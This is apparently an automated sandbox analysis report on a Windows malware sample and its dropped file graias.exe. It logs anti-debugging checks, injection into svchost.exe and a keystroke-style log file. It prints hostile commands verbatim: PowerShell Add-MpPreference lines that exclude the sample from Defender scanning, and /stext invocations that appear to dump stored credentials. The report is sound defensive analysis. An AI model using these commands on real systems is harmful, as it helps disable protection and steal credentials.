                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe Code function: 5_2_0041BCF3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe Code function: 5_2_00442564 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Code function: 8_2_10004AB4 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe Code function: 5_2_0044E93E GetProcessHeap
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe Process token adjusted: Debug
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Process token adjusted: Debug
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe Code function: 5_2_00434178 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe Code function: 5_2_0043A66D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe Code function: 5_2_00433B54 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe Code function: 5_2_00433CE7 SetUnhandledExceptionFilter
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Code function: 8_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Code function: 8_2_10002639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Code function: 8_2_10002B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe Memory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\iGhDjzEiDU.exe"
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\Graias\graias.exe"
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe Memory written: C:\Users\user\Desktop\iGhDjzEiDU.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Memory written: C:\Users\user\AppData\Roaming\Graias\graias.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Section loaded: NULL target: C:\Users\user\AppData\Roaming\Graias\graias.exe protection: execute and read and write
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 2818008
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 26D6008
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 2DBB008
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 257D008
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 24A2008
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 25E3008
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 2E36008
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 2E89008
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 266A008
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe Code function: 5_2_00410F36 GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe Code function: 5_2_00418764 mouse_event
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\iGhDjzEiDU.exe"Jump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeProcess created: C:\Users\user\Desktop\iGhDjzEiDU.exe "C:\Users\user\Desktop\iGhDjzEiDU.exe"Jump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeProcess created: C:\Users\user\Desktop\iGhDjzEiDU.exe "C:\Users\user\Desktop\iGhDjzEiDU.exe"Jump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeProcess created: C:\Users\user\AppData\Roaming\Graias\graias.exe "C:\Users\user\AppData\Roaming\Graias\graias.exe" Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\Graias\graias.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Users\user\AppData\Roaming\Graias\graias.exe "C:\Users\user\AppData\Roaming\Graias\graias.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\System32\dxdiag.exe" /t C:\Users\user\AppData\Local\Temp\sysinfo.txt
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Users\user\AppData\Roaming\Graias\graias.exe C:\Users\user\AppData\Roaming\Graias\graias.exe /stext "C:\Users\user\AppData\Local\Temp\epwvcdsubpgsncdkmqhibndmvhurqgg"
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Users\user\AppData\Roaming\Graias\graias.exe C:\Users\user\AppData\Roaming\Graias\graias.exe /stext "C:\Users\user\AppData\Local\Temp\epwvcdsubpgsncdkmqhibndmvhurqgg"
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Users\user\AppData\Roaming\Graias\graias.exe C:\Users\user\AppData\Roaming\Graias\graias.exe /stext "C:\Users\user\AppData\Local\Temp\epwvcdsubpgsncdkmqhibndmvhurqgg"
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Users\user\AppData\Roaming\Graias\graias.exe C:\Users\user\AppData\Roaming\Graias\graias.exe /stext "C:\Users\user\AppData\Local\Temp\orbocvcopxyxxqzovbukeapdendakrxtoq"
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Users\user\AppData\Roaming\Graias\graias.exe C:\Users\user\AppData\Roaming\Graias\graias.exe /stext "C:\Users\user\AppData\Local\Temp\rlggdon"
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Users\user\AppData\Roaming\Graias\graias.exe C:\Users\user\AppData\Roaming\Graias\graias.exe /stext "C:\Users\user\AppData\Local\Temp\rlggdon"
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\xyepttayrhgkznkxmawzcpzmosukc.vbs"
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: logs.dat.8.dr | Binary or memory string: [2025/01/03 18:02:24 Program Manager]
                Source: logs.dat.8.dr | Binary or memory string: [2025/01/03 18:03:45 Program Manager]
                Source: logs.dat.8.dr | Binary or memory string: [2025/01/03 18:02:45 Program Manager]
                Source: graias.exe, 00000008.00000002.2395821295.00000000011E7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: |Program Manager|
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Code function: 5_2_00433E1A cpuid 5_2_00433E1A
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Code function: GetLocaleInfoW,5_2_004510CA
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Code function: EnumSystemLocalesW,5_2_004470BE
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,5_2_004511F3
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Code function: GetLocaleInfoW,5_2_004512FA
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,5_2_004513C7
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Code function: GetLocaleInfoW,5_2_004475A7
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Code function: GetLocaleInfoA,5_2_0040E679
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,5_2_00450A8F
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Code function: EnumSystemLocalesW,5_2_00450D52
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Code function: EnumSystemLocalesW,5_2_00450D07
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Code function: EnumSystemLocalesW,5_2_00450DED
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,5_2_00450E7A
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Users\user\Desktop\iGhDjzEiDU.exe VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
